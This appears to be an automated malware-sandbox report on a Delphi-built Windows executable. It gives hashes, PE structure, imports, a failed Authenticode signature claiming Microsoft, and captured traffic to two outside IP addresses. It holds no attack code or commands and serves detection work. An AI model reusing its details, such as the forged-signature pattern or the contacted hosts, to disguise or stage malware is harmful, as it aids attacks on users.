                                                                                                            SHA256:3a89a79e825bf330e3ea46f6a5f548529b642dc61219a8deeaec070a0688a08e
                                                                                                            SHA512:798b7004b2019ffbff67a1f3636ad7dd3b93ef0a9338960d8a7e69eda79aa7d9e097aa888b68f942e21f0a89e98dca66d679f56d06b9ab7b81c4241b1f5840f8
                                                                                                            SSDEEP:12288:sp7ku8t5ppfEQetKjNRfdjmrY2CprWkbR7X8uD79b7eUlgufunPQNZT:sp7Xs5otKjNR1J2YRPDR2eZfunPQDT
                                                                                                            File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                                                                                            File Icon

                                                                                                            Icon Hash:64ccd4f0f0f0f8d4

                                                                                                            Static PE Info

                                                                                                            General

                                                                                                            Entrypoint:0x48116c
                                                                                                            Entrypoint Section:CODE
                                                                                                            Digitally signed:true
                                                                                                            Imagebase:0x400000
                                                                                                            Subsystem:windows gui
                                                                                                            Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI, RELOCS_STRIPPED
                                                                                                            DLL Characteristics:
                                                                                                            Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                                                            TLS Callbacks:
                                                                                                            CLR (.Net) Version:
                                                                                                            OS Version Major:4
                                                                                                            OS Version Minor:0
                                                                                                            File Version Major:4
                                                                                                            File Version Minor:0
                                                                                                            Subsystem Version Major:4
                                                                                                            Subsystem Version Minor:0
                                                                                                            Import Hash:89589872fc7726fd761d44d4f95ea8b1

                                                                                                            Authenticode Signature

                                                                                                            Signature Valid:false
                                                                                                            Signature Issuer:CN=Microsoft Code Signing PCA, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
                                                                                                            Signature Validation Error:The digital signature of the object did not verify
                                                                                                            Error Number:-2146869232
                                                                                                            Not Before, Not After
                                                                                                            • 12/7/2009 2:40:29 PM 3/7/2011 2:40:29 PM
                                                                                                            Subject Chain
                                                                                                            • CN=Microsoft Corporation, OU=MOPR, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
                                                                                                            Version:3
                                                                                                            Thumbprint MD5:E3FEDB37F4874E84CDB82A789FFDCD67
                                                                                                            Thumbprint SHA-1:9617094A1CFB59AE7C1F7DFDB6739E4E7C40508F
                                                                                                            Thumbprint SHA-256:277D42066A68326BA10B1874D393327404287C14A9C9DB1C09D50698952A17DD
                                                                                                            Serial:6101CF3E00000000000F

                                                                                                            Entrypoint Preview

                                                                                                            Instruction
                                                                                                            push ebp
                                                                                                            mov ebp, esp
                                                                                                            add esp, FFFFFFF0h
                                                                                                            push ebx
                                                                                                            mov eax, 00480EDCh
                                                                                                            call 00007F4BC8B4D984h
                                                                                                            mov ebx, dword ptr [00483E58h]
                                                                                                            mov eax, dword ptr [ebx]
                                                                                                            call 00007F4BC8BA7A5Fh
                                                                                                            mov eax, dword ptr [ebx]
                                                                                                            mov edx, 004811E8h
                                                                                                            call 00007F4BC8BA763Bh
                                                                                                            mov ecx, dword ptr [00483EFCh]
                                                                                                            mov eax, dword ptr [ebx]
                                                                                                            mov edx, dword ptr [00480158h]
                                                                                                            call 00007F4BC8BA7A58h
                                                                                                            mov ecx, dword ptr [00483E74h]
                                                                                                            mov eax, dword ptr [ebx]
                                                                                                            mov edx, dword ptr [004686BCh]
                                                                                                            call 00007F4BC8BA7A45h
                                                                                                            mov eax, dword ptr [00483EFCh]
                                                                                                            mov eax, dword ptr [eax]
                                                                                                            xor edx, edx
                                                                                                            call 00007F4BC8BA0F13h
                                                                                                            mov eax, dword ptr [ebx]
                                                                                                            mov byte ptr [eax+5Bh], 00000000h
                                                                                                            mov eax, dword ptr [ebx]
                                                                                                            call 00007F4BC8BA7AAAh
                                                                                                            pop ebx
                                                                                                            call 00007F4BC8B4B710h
                                                                                                            add byte ptr [eax], al
                                                                                                            add bh, bh

                                                                                                            Data Directories

                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x870000x24dc.idata
                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x960000x46c00.rsrc
                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0xd5a000x1770.rsrc
                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x8c0000x9740.reloc
                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x8b0000x18.rdata
                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                            Sections

                                                                                                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                            CODE0x10000x801f40x80200False0.515535442073data6.50883615521IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                            DATA0x820000x20040x2200False0.376723345588data4.44302763906IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                            BSS0x850000x11150x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                            .idata0x870000x24dc0x2600False0.357113486842data4.9259049312IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                            .tls0x8a0000x400x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                            .rdata0x8b0000x180x200False0.05078125data0.20448815744IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                                            .reloc0x8c0000x97400x9800False0.545718544408data6.629801538IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                                            .rsrc0x960000x46c000x46c00False0.539121162765data7.04108058953IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ

                                                                                                            Resources

                                                                                                            NameRVASizeTypeLanguageCountry
                                                                                                            RT_CURSOR0x96c9c0x134data
                                                                                                            RT_CURSOR0x96dd00x134data
                                                                                                            RT_CURSOR0x96f040x134data
                                                                                                            RT_CURSOR0x970380x134data
                                                                                                            RT_CURSOR0x9716c0x134data
                                                                                                            RT_CURSOR0x972a00x134data
                                                                                                            RT_CURSOR0x973d40x134data
                                                                                                            RT_BITMAP0x975080x1d0data
                                                                                                            RT_BITMAP0x976d80x1e4data
                                                                                                            RT_BITMAP0x978bc0x1d0data
                                                                                                            RT_BITMAP0x97a8c0x1d0data
                                                                                                            RT_BITMAP0x97c5c0x1d0data
                                                                                                            RT_BITMAP0x97e2c0x1d0data
                                                                                                            RT_BITMAP0x97ffc0x1d0data
                                                                                                            RT_BITMAP0x981cc0x1d0data
                                                                                                            RT_BITMAP0x9839c0x1d0data
                                                                                                            RT_BITMAP0x9856c0x1d0data
                                                                                                            RT_BITMAP0x9873c0xe8GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                                            RT_ICON0x988240x10a8dataEnglishUnited States
                                                                                                            RT_ICON0x998cc0x25a8dataEnglishUnited States
                                                                                                            RT_ICON0x9be740x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 49407, next used block 4294909696EnglishUnited States
                                                                                                            RT_ICON0xa009c0x5488dataEnglishUnited States
                                                                                                            RT_ICON0xa55240xa2a8dataEnglishUnited States
                                                                                                            RT_DIALOG0xaf7cc0x52data
                                                                                                            RT_STRING0xaf8200xacdata
                                                                                                            RT_STRING0xaf8cc0x1ccdata
                                                                                                            RT_STRING0xafa980x188data
                                                                                                            RT_STRING0xafc200x1b0data
                                                                                                            RT_STRING0xafdd00x618data
                                                                                                            RT_STRING0xb03e80x244data
                                                                                                            RT_STRING0xb062c0xe8data
                                                                                                            RT_STRING0xb07140x12cdata
                                                                                                            RT_STRING0xb08400x2ecdata
                                                                                                            RT_STRING0xb0b2c0x410data
                                                                                                            RT_STRING0xb0f3c0x380data
                                                                                                            RT_STRING0xb12bc0x418data
                                                                                                            RT_STRING0xb16d40x1b0data
                                                                                                            RT_STRING0xb18840xecdata
                                                                                                            RT_STRING0xb19700x1e4data
                                                                                                            RT_STRING0xb1b540x3e8data
                                                                                                            RT_STRING0xb1f3c0x358data
                                                                                                            RT_STRING0xb22940x2b4data
                                                                                                            RT_RCDATA0xb25480x10data
                                                                                                            RT_RCDATA0xb25580x380data
                                                                                                            RT_RCDATA0xb28d80x801Delphi compiled form 'TFormFilter'
                                                                                                            RT_RCDATA0xb30dc0x6c3Delphi compiled form 'TMainPage'
                                                                                                            RT_RCDATA0xb37a00x28fb0GIF image data, version 89a, 777 x 321EnglishUnited States
                                                                                                            RT_GROUP_CURSOR0xdc7500x14Lotus unknown worksheet or configuration, revision 0x1
                                                                                                            RT_GROUP_CURSOR0xdc7640x14Lotus unknown worksheet or configuration, revision 0x1
                                                                                                            RT_GROUP_CURSOR0xdc7780x14Lotus unknown worksheet or configuration, revision 0x1
                                                                                                            RT_GROUP_CURSOR0xdc78c0x14Lotus unknown worksheet or configuration, revision 0x1
                                                                                                            RT_GROUP_CURSOR0xdc7a00x14Lotus unknown worksheet or configuration, revision 0x1
                                                                                                            RT_GROUP_CURSOR0xdc7b40x14Lotus unknown worksheet or configuration, revision 0x1
                                                                                                            RT_GROUP_CURSOR0xdc7c80x14Lotus unknown worksheet or configuration, revision 0x1
                                                                                                            RT_GROUP_ICON0xdc7dc0x4cdataEnglishUnited States
                                                                                                            RT_MANIFEST0xdc8280x336XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States

                                                                                                            Imports

                                                                                                            DLLImport
                                                                                                            kernel32.dllDeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetTickCount, QueryPerformanceCounter, GetVersion, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, SetCurrentDirectoryA, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, WriteFile, UnhandledExceptionFilter, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetFileType, CreateFileA, CloseHandle
                                                                                                            user32.dllGetKeyboardType, LoadStringA, MessageBoxA, CharNextA
                                                                                                            advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                                                                                                            oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
                                                                                                            kernel32.dllTlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
                                                                                                            advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                                                                                                            kernel32.dlllstrcpyA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualProtect, VirtualAlloc, Sleep, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MulDiv, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalReAlloc, GlobalHandle, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetSystemInfo, GetStringTypeExA, GetStdHandle, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCPInfo, GetACP, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, FindFirstFileA, FindClose, FileTimeToLocalFileTime, FileTimeToDosDateTime, EnumCalendarInfoA, EnterCriticalSection, DeleteFileA, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CreateDirectoryA, CompareStringA, CloseHandle
                                                                                                            version.dllVerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
                                                                                                            gdi32.dllUnrealizeObject, StretchBlt, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SelectClipRgn, SaveDC, RestoreDC, Rectangle, RectVisible, RealizePalette, Polyline, Polygon, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPointA, GetTextExtentPoint32A, GetTextAlign, GetSystemPaletteEntries, GetStockObject, GetROP2, GetPolyFillMode, GetPixelFormat, GetPixel, GetPaletteEntries, GetObjectA, GetMapMode, GetGraphicsMode, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetDCPenColor, GetDCBrushColor, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBkMode, GetBkColor, GetBitmapBits, GdiFlush, ExcludeClipRect, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, BitBlt
                                                                                                            user32.dllCreateWindowExA, WindowFromPoint, WinHelpA, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCursor, ShowCaret, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClipboardData, SetClassLongA, SetCapture, SetActiveWindow, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageA, OpenClipboard, OffsetRect, OemToCharA, MessageBoxA, MessageBeep, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, HideCaret, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassNameA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, EmptyClipboard, DrawTextA, DrawStateA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, CloseClipboard, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharUpperBuffA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
                                                                                                            kernel32.dllSleep
                                                                                                            oleaut32.dllSafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
                                                                                                            comctl32.dllImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_SetDragCursorImage, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Replace, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Add, ImageList_SetImageCount, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create, InitCommonControls
                                                                                                            wininet.dllInternetReadFile, InternetOpenUrlA, InternetOpenA, InternetCloseHandle
                                                                                                            winmm.dllsndPlaySoundA

                                                                                                            Possible Origin

                                                                                                            Language of compilation systemCountry where language is spokenMap
                                                                                                            EnglishUnited States

                                                                                                            Network Behavior

                                                                                                            Network Port Distribution

                                                                                                            TCP Packets

                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                            Nov 21, 2020 21:00:57.865257025 CET49707443192.168.2.3162.159.136.232
                                                                                                            Nov 21, 2020 21:00:57.882230997 CET44349707162.159.136.232192.168.2.3
                                                                                                            Nov 21, 2020 21:00:57.882400990 CET49707443192.168.2.3162.159.136.232
                                                                                                            Nov 21, 2020 21:00:57.883415937 CET49707443192.168.2.3162.159.136.232
                                                                                                            Nov 21, 2020 21:00:57.900219917 CET44349707162.159.136.232192.168.2.3
                                                                                                            Nov 21, 2020 21:00:57.900384903 CET49707443192.168.2.3162.159.136.232
                                                                                                            Nov 21, 2020 21:00:58.107439995 CET4970880192.168.2.3198.136.51.123
                                                                                                            Nov 21, 2020 21:00:58.232023954 CET8049708198.136.51.123192.168.2.3
                                                                                                            Nov 21, 2020 21:00:58.232170105 CET4970880192.168.2.3198.136.51.123
                                                                                                            Nov 21, 2020 21:00:58.233391047 CET4970880192.168.2.3198.136.51.123
                                                                                                            Nov 21, 2020 21:00:58.358604908 CET8049708198.136.51.123192.168.2.3
                                                                                                            Nov 21, 2020 21:00:58.360580921 CET8049708198.136.51.123192.168.2.3
                                                                                                            Nov 21, 2020 21:00:58.360635042 CET8049708198.136.51.123192.168.2.3
                                                                                                            Nov 21, 2020 21:00:58.360675097 CET8049708198.136.51.123192.168.2.3
                                                                                                            Nov 21, 2020 21:00:58.360675097 CET4970880192.168.2.3198.136.51.123
                                                                                                            Nov 21, 2020 21:00:58.360706091 CET4970880192.168.2.3198.136.51.123
                                                                                                            Nov 21, 2020 21:00:58.360712051 CET8049708198.136.51.123192.168.2.3
                                                                                                            Nov 21, 2020 21:00:58.360726118 CET4970880192.168.2.3198.136.51.123
                                                                                                            Nov 21, 2020 21:00:58.360750914 CET8049708198.136.51.123192.168.2.3
                                                                                                            Nov 21, 2020 21:00:58.360774040 CET4970880192.168.2.3198.136.51.123
                                                                                                            Nov 21, 2020 21:00:58.360788107 CET8049708198.136.51.123192.168.2.3
                                                                                                            Nov 21, 2020 21:00:58.360805988 CET4970880192.168.2.3198.136.51.123
                                                                                                            Nov 21, 2020 21:00:58.360836029 CET8049708198.136.51.123192.168.2.3
                                                                                                            Nov 21, 2020 21:00:58.360841990 CET4970880192.168.2.3198.136.51.123
                                                                                                            Nov 21, 2020 21:00:58.360877991 CET8049708198.136.51.123192.168.2.3
                                                                                                            Nov 21, 2020 21:00:58.360894918 CET4970880192.168.2.3198.136.51.123
                                                                                                            Nov 21, 2020 21:00:58.360914946 CET8049708198.136.51.123192.168.2.3
                                                                                                            Nov 21, 2020 21:00:58.360932112 CET4970880192.168.2.3198.136.51.123
                                                                                                            Nov 21, 2020 21:00:58.360954046 CET8049708198.136.51.123192.168.2.3
                                                                                                            Nov 21, 2020 21:00:58.360969067 CET4970880192.168.2.3198.136.51.123
                                                                                                            Nov 21, 2020 21:00:58.361007929 CET4970880192.168.2.3198.136.51.123
                                                                                                            Nov 21, 2020 21:00:58.485824108 CET8049708198.136.51.123192.168.2.3
                                                                                                            Nov 21, 2020 21:00:58.485892057 CET8049708198.136.51.123192.168.2.3
                                                                                                            Nov 21, 2020 21:00:58.486099005 CET4970880192.168.2.3198.136.51.123
                                                                                                            Nov 21, 2020 21:00:58.486788034 CET8049708198.136.51.123192.168.2.3
                                                                                                            Nov 21, 2020 21:00:58.486826897 CET8049708198.136.51.123192.168.2.3
                                                                                                            Nov 21, 2020 21:00:58.486881971 CET4970880192.168.2.3198.136.51.123
                                                                                                            Nov 21, 2020 21:00:58.486921072 CET4970880192.168.2.3198.136.51.123
                                                                                                            Nov 21, 2020 21:00:58.487808943 CET8049708198.136.51.123192.168.2.3
                                                                                                            Nov 21, 2020 21:00:58.487850904 CET8049708198.136.51.123192.168.2.3
                                                                                                            Nov 21, 2020 21:00:58.487886906 CET4970880192.168.2.3198.136.51.123
                                                                                                            Nov 21, 2020 21:00:58.487907887 CET4970880192.168.2.3198.136.51.123
                                                                                                            Nov 21, 2020 21:00:58.488884926 CET8049708198.136.51.123192.168.2.3
                                                                                                            Nov 21, 2020 21:00:58.488924026 CET8049708198.136.51.123192.168.2.3
                                                                                                            Nov 21, 2020 21:00:58.488969088 CET4970880192.168.2.3198.136.51.123
                                                                                                            Nov 21, 2020 21:00:58.488990068 CET4970880192.168.2.3198.136.51.123
                                                                                                            Nov 21, 2020 21:00:58.490993023 CET8049708198.136.51.123192.168.2.3
                                                                                                            Nov 21, 2020 21:00:58.491034985 CET8049708198.136.51.123192.168.2.3
                                                                                                            Nov 21, 2020 21:00:58.491086960 CET4970880192.168.2.3198.136.51.123
                                                                                                            Nov 21, 2020 21:00:58.491106987 CET4970880192.168.2.3198.136.51.123
                                                                                                            Nov 21, 2020 21:00:58.492034912 CET8049708198.136.51.123192.168.2.3
                                                                                                            Nov 21, 2020 21:00:58.492073059 CET8049708198.136.51.123192.168.2.3
                                                                                                            Nov 21, 2020 21:00:58.492113113 CET8049708198.136.51.123192.168.2.3
                                                                                                            Nov 21, 2020 21:00:58.492119074 CET4970880192.168.2.3198.136.51.123
                                                                                                            Nov 21, 2020 21:00:58.492145061 CET4970880192.168.2.3198.136.51.123
                                                                                                            Nov 21, 2020 21:00:58.492157936 CET4970880192.168.2.3198.136.51.123
                                                                                                            Nov 21, 2020 21:00:58.492188931 CET8049708198.136.51.123192.168.2.3
                                                                                                            Nov 21, 2020 21:00:58.492247105 CET4970880192.168.2.3198.136.51.123
                                                                                                            Nov 21, 2020 21:00:58.494168997 CET8049708198.136.51.123192.168.2.3
                                                                                                            Nov 21, 2020 21:00:58.494206905 CET8049708198.136.51.123192.168.2.3
                                                                                                            Nov 21, 2020 21:00:58.494236946 CET4970880192.168.2.3198.136.51.123
                                                                                                            Nov 21, 2020 21:00:58.494257927 CET4970880192.168.2.3198.136.51.123
                                                                                                            Nov 21, 2020 21:00:58.495248079 CET8049708198.136.51.123192.168.2.3
                                                                                                            Nov 21, 2020 21:00:58.495296001 CET8049708198.136.51.123192.168.2.3
                                                                                                            Nov 21, 2020 21:00:58.495337009 CET4970880192.168.2.3198.136.51.123
                                                                                                            Nov 21, 2020 21:00:58.495361090 CET4970880192.168.2.3198.136.51.123
                                                                                                            Nov 21, 2020 21:00:58.610560894 CET8049708198.136.51.123192.168.2.3
                                                                                                            Nov 21, 2020 21:00:58.610625029 CET8049708198.136.51.123192.168.2.3
                                                                                                            Nov 21, 2020 21:00:58.610898972 CET4970880192.168.2.3198.136.51.123
                                                                                                            Nov 21, 2020 21:00:58.611438990 CET8049708198.136.51.123192.168.2.3
                                                                                                            Nov 21, 2020 21:00:58.611478090 CET8049708198.136.51.123192.168.2.3
                                                                                                            Nov 21, 2020 21:00:58.611557007 CET4970880192.168.2.3198.136.51.123
                                                                                                            Nov 21, 2020 21:00:58.611632109 CET4970880192.168.2.3198.136.51.123
                                                                                                            Nov 21, 2020 21:00:58.612483025 CET8049708198.136.51.123192.168.2.3
                                                                                                            Nov 21, 2020 21:00:58.612530947 CET8049708198.136.51.123192.168.2.3
                                                                                                            Nov 21, 2020 21:00:58.612622023 CET4970880192.168.2.3198.136.51.123
                                                                                                            Nov 21, 2020 21:00:58.612694979 CET4970880192.168.2.3198.136.51.123
                                                                                                            Nov 21, 2020 21:00:58.613364935 CET8049708198.136.51.123192.168.2.3
                                                                                                            Nov 21, 2020 21:00:58.613445997 CET8049708198.136.51.123192.168.2.3
                                                                                                            Nov 21, 2020 21:00:58.613486052 CET8049708198.136.51.123192.168.2.3
                                                                                                            Nov 21, 2020 21:00:58.613502026 CET4970880192.168.2.3198.136.51.123
                                                                                                            Nov 21, 2020 21:00:58.613522053 CET8049708198.136.51.123192.168.2.3
                                                                                                            Nov 21, 2020 21:00:58.613570929 CET4970880192.168.2.3198.136.51.123
                                                                                                            Nov 21, 2020 21:00:58.613687992 CET4970880192.168.2.3198.136.51.123
                                                                                                            Nov 21, 2020 21:00:58.615385056 CET8049708198.136.51.123192.168.2.3
                                                                                                            Nov 21, 2020 21:00:58.615434885 CET8049708198.136.51.123192.168.2.3
                                                                                                            Nov 21, 2020 21:00:58.615511894 CET4970880192.168.2.3198.136.51.123
                                                                                                            Nov 21, 2020 21:00:58.615571976 CET4970880192.168.2.3198.136.51.123
                                                                                                            Nov 21, 2020 21:00:58.616334915 CET8049708198.136.51.123192.168.2.3
                                                                                                            Nov 21, 2020 21:00:58.616413116 CET8049708198.136.51.123192.168.2.3
                                                                                                            Nov 21, 2020 21:00:58.616457939 CET4970880192.168.2.3198.136.51.123
                                                                                                            Nov 21, 2020 21:00:58.616525888 CET4970880192.168.2.3198.136.51.123
                                                                                                            Nov 21, 2020 21:00:58.617328882 CET8049708198.136.51.123192.168.2.3
                                                                                                            Nov 21, 2020 21:00:58.617369890 CET8049708198.136.51.123192.168.2.3
                                                                                                            Nov 21, 2020 21:00:58.617432117 CET4970880192.168.2.3198.136.51.123
                                                                                                            Nov 21, 2020 21:00:58.617512941 CET4970880192.168.2.3198.136.51.123
                                                                                                            Nov 21, 2020 21:00:58.633702040 CET8049708198.136.51.123192.168.2.3
                                                                                                            Nov 21, 2020 21:00:58.633744001 CET8049708198.136.51.123192.168.2.3
                                                                                                            Nov 21, 2020 21:00:58.633783102 CET8049708198.136.51.123192.168.2.3
                                                                                                            Nov 21, 2020 21:00:58.633821011 CET8049708198.136.51.123192.168.2.3

                                                                                                            UDP Packets

                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                            Nov 21, 2020 21:00:57.806708097 CET5598453192.168.2.38.8.8.8
                                                                                                            Nov 21, 2020 21:00:57.842557907 CET53559848.8.8.8192.168.2.3
                                                                                                            Nov 21, 2020 21:00:57.945060015 CET6418553192.168.2.38.8.8.8
                                                                                                            Nov 21, 2020 21:00:58.102300882 CET53641858.8.8.8192.168.2.3
                                                                                                            Nov 21, 2020 21:01:17.813679934 CET6511053192.168.2.38.8.8.8
                                                                                                            Nov 21, 2020 21:01:17.840747118 CET53651108.8.8.8192.168.2.3
                                                                                                            Nov 21, 2020 21:01:18.258506060 CET5836153192.168.2.38.8.8.8
                                                                                                            Nov 21, 2020 21:01:18.285604954 CET53583618.8.8.8192.168.2.3
                                                                                                            Nov 21, 2020 21:01:18.618001938 CET6349253192.168.2.38.8.8.8
                                                                                                            Nov 21, 2020 21:01:18.645210028 CET53634928.8.8.8192.168.2.3
                                                                                                            Nov 21, 2020 21:01:19.719357967 CET6083153192.168.2.38.8.8.8
                                                                                                            Nov 21, 2020 21:01:19.754842997 CET53608318.8.8.8192.168.2.3
                                                                                                            Nov 21, 2020 21:01:20.850640059 CET6010053192.168.2.38.8.8.8
                                                                                                            Nov 21, 2020 21:01:20.877729893 CET53601008.8.8.8192.168.2.3
                                                                                                            Nov 21, 2020 21:01:21.957295895 CET5319553192.168.2.38.8.8.8
                                                                                                            Nov 21, 2020 21:01:21.984338999 CET53531958.8.8.8192.168.2.3
                                                                                                            Nov 21, 2020 21:01:22.735436916 CET5014153192.168.2.38.8.8.8
                                                                                                            Nov 21, 2020 21:01:22.762587070 CET53501418.8.8.8192.168.2.3
                                                                                                            Nov 21, 2020 21:01:23.520838976 CET5302353192.168.2.38.8.8.8
